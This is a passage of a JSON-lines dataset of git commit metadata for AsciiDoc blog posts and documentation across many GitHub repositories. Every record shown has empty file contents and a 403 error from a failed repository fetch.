<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp,nmorey\/odp,nmorey\/odp,mike-holmes-linaro\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"babffeb405efc68fc90f961fe2d2682532607e71","subject":"y2b create post How to cut your SIM card (Micro SIM, Nano SIM - iPhone 5)","message":"y2b create post How to cut your SIM card (Micro SIM, Nano SIM - iPhone 5)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-08-How-to-cut-your-SIM-card-Micro-SIM-Nano-SIM--iPhone-5.adoc","new_file":"_posts\/2012-12-08-How-to-cut-your-SIM-card-Micro-SIM-Nano-SIM--iPhone-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e93c5006ab5120ccfa12faf7bf449703ebdbf8e6","subject":"Update 2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","message":"Update 2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","new_file":"_posts\/2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b838aa3de8d8bb6e0bd9549a08d8f667a403a6","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3799feb75961260b6e0c4fbcd739bc2a73249b3","subject":"add setting cluster using Route53 phz","message":"add setting cluster using Route53 
phz\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"setup_cluster\/README.adoc","new_file":"setup_cluster\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2a37c8c031008f229daba525d0fee4f2d4c37c1","subject":"fixed doc on marshalling other datatypes than yaml","message":"fixed doc on marshalling other datatypes than yaml\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-groovy\/src\/main\/asciidoc\/groovy\/index.adoc","new_file":"rx-groovy\/src\/main\/asciidoc\/groovy\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9c600c28d5c8a8a213dc4a7c8a19375155c6796","subject":"Dep confl","message":"Dep confl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41a23ec3c71ac1b6a91616a233f61ee87938bb26","subject":"y2b create post Google Glass Prescription Glasses!","message":"y2b create post Google Glass Prescription Glasses!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-15-Google-Glass-Prescription-Glasses.adoc","new_file":"_posts\/2014-02-15-Google-Glass-Prescription-Glasses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49091c92716bc1d4218412b9a58e527f35f7fe76","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8884629e4065b6f539c03bbbd4505a2549980bc9","subject":"Delete the file at '_posts\/2017-05-31-Java-Classes.adoc'","message":"Delete the file at '_posts\/2017-05-31-Java-Classes.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-Classes.adoc","new_file":"_posts\/2017-05-31-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e997bc79eb3e3c6c9c4d5d48fed184a89c0abab0","subject":"Update 2015-04-20-15420-Swift.adoc","message":"Update 2015-04-20-15420-Swift.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-20-15420-Swift.adoc","new_file":"_posts\/2015-04-20-15420-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8bc76ddf974f49f33490b07ba8aaebbfc8367cf","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1557c688fa0aafb4cbeb33ced7819291ffac4f51","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ba235ac9c3b1275a74551602edcb820f8efc42","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8c738f5d61fad9ada5a7d9aa9ec62fe8a56f35","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece0668da576624f3e63b786cb85c8c1ec40c902","subject":"Update 2016-05-06-First-post.adoc","message":"Update 2016-05-06-First-post.adoc","repos":"hildjj\/hildjj.github.io","old_file":"_posts\/2016-05-06-First-post.adoc","new_file":"_posts\/2016-05-06-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/hildjj\/hildjj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e9d5b9cb6d423856032ee62a165278696be0ea2","subject":"Update 2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","message":"Update 2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","new_file":"_posts\/2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04dc1cb3ac7a844a811d85614d2eb123da2c1995","subject":"Update 2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","message":"Update 2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","new_file":"_posts\/2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf23bf9473f86e4518d69040ce5909e4f64b739","subject":"refactor(Ch3): add header id","message":"refactor(Ch3): add header id\n","repos":"dieface\/promises-book,genie88\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,azu\/promises-book,azu\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,charlenopires\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,sunfurong\/promise,genie88\/promises-book,mzbac\/promises-book,liubin\/promises-book,liubin\/promises-book,wenber\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,genie88\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,cqricky\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book","old_file":"Ch3_Testing\/control_tests.adoc","new_file":"Ch3_Testing\/control_tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b532618903b8d59a04e79d8d4cf509139c2134","subject":"Update 2015-10-06-Scala-Basics.adoc","message":"Update 
2015-10-06-Scala-Basics.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1af02731841c87589a13a848be930acd1c41d035","subject":"Update 2016-06-22-Another-Post.adoc","message":"Update 2016-06-22-Another-Post.adoc","repos":"arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io","old_file":"_posts\/2016-06-22-Another-Post.adoc","new_file":"_posts\/2016-06-22-Another-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arabindamoni\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efc8406ee39470304e3c4c3f584e0b5a2e56026","subject":"Update 2016-11-14-20161113.adoc","message":"Update 2016-11-14-20161113.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-20161113.adoc","new_file":"_posts\/2016-11-14-20161113.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef809141a804f30ad08b60b22e9cdb75f7fe5817","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57d13665947100aeadfc45ed3e377a06c335cbe1","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee3e272b11d41e33caaa7c2e4292214161ab52f","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cc395b84281c230d8a73ca2510a722259db25a1","subject":"Update 2017-01-01-7-Li7W-Ruby.adoc","message":"Update 
2017-01-01-7-Li7W-Ruby.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-01-01-7-Li7W-Ruby.adoc","new_file":"_posts\/2017-01-01-7-Li7W-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e34054d5d58e95fe508233783f484879e4ec5725","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7b5a2b7f2320f6756efa6a458a8b517e796726","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f360a44c7d3b4d3139e4842e5d475af73a40a1ca","subject":"Deleted 2017-02-25adoc.adoc","message":"Deleted 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af35b3f52967ab780c481deaef2fc7fac8697ed8","subject":"Update 2018-06-25-quick-rebel.adoc","message":"Update 2018-06-25-quick-rebel.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-25-quick-rebel.adoc","new_file":"_posts\/2018-06-25-quick-rebel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"500d2b5ff2c7e72fcf9b5166134ef627eddcfddd","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 
2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da53b1471ea7cbd088426bfcf4870b78a2277a3d","subject":"renaming and cleaning up","message":"renaming and cleaning up\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-ticket-monster.adoc","new_file":"chapters\/docker-ticket-monster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57a27155a132d4d798e1170600b254c8333dca49","subject":"Update 2015-03-24-Welcome.adoc","message":"Update 2015-03-24-Welcome.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-24-Welcome.adoc","new_file":"_posts\/2015-03-24-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51ccc3afaace37dc6378578ce44561ad1765da76","subject":"Job: 12021","message":"Job: 12021\n\nInitial analysis for early review","repos":"xtuml\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc","old_file":"doc\/notes\/12021_runtime_model_integration\/12021_runtime_model_integration.ant.adoc","new_file":"doc\/notes\/12021_runtime_model_integration\/12021_runtime_model_integration.ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ee98d97536dda68f76b303370da8c6d221a865b","subject":"Adding release notes for release of coverage revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin","message":"Adding release notes for release of coverage revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml 
revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-bugfixes.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-bugfixes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f5c0de773e9faf8a06d8c55f39974a80d5ba32d","subject":"Update 2017-11-19-Sony-WH-1000X-M-Review.adoc","message":"Update 2017-11-19-Sony-WH-1000X-M-Review.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-19-Sony-WH-1000X-M-Review.adoc","new_file":"_posts\/2017-11-19-Sony-WH-1000X-M-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9041ab05b4e0ffafd093e13039c17257c325641","subject":"Initial blog post for release","message":"Initial blog post for release\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"blog\/2014-08-29-1_0_0_alpha02.adoc","new_file":"blog\/2014-08-29-1_0_0_alpha02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"27845330b96a4ed52b953c9b5860b458e02ed598","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3928c0045dd0b91186c0118796ba02cc128be4a","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc88841163b797e8ab78af811b7d3804cadf2e0f","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 
2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d0f2506140e9559da2cf93c4b34349e7b8d6ac9","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/reclojure.adoc","new_file":"content\/events\/2022\/reclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3b1e143c8eb2437d41766d7bfd577cd577271ee0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/06\/02\/deref.adoc","new_file":"content\/news\/2022\/06\/02\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"66067cf693625f334f7451037240a74a0a53ec14","subject":"Added README.asciidoc for parser-xml","message":"Added README.asciidoc for 